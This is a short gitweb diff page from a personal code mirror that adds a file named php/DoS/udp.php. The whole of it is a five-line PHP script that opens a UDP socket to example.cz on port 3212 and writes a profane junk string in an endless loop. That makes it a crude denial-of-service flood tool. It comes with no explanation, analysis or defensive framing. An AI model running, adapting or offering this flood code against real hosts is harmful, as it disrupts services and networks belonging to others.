Added junk found in ~harvie at harvie.cz
[mirrors/Programs.git] / php / DoS / udp.php
diff --git a/php/DoS/udp.php b/php/DoS/udp.php
new file mode 100755 (executable)
index 0000000..6af1c19
--- /dev/null
@@ -0,0 +1,5 @@
+#!/usr/bin/php
+<?php
+
+$fp = fsockopen("udp://example.cz", 3212);
+while(1) fwrite($fp, "LOOL-FUCK-U-ALLOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO");
This page took 0.127806 seconds and 4 git commands to generate.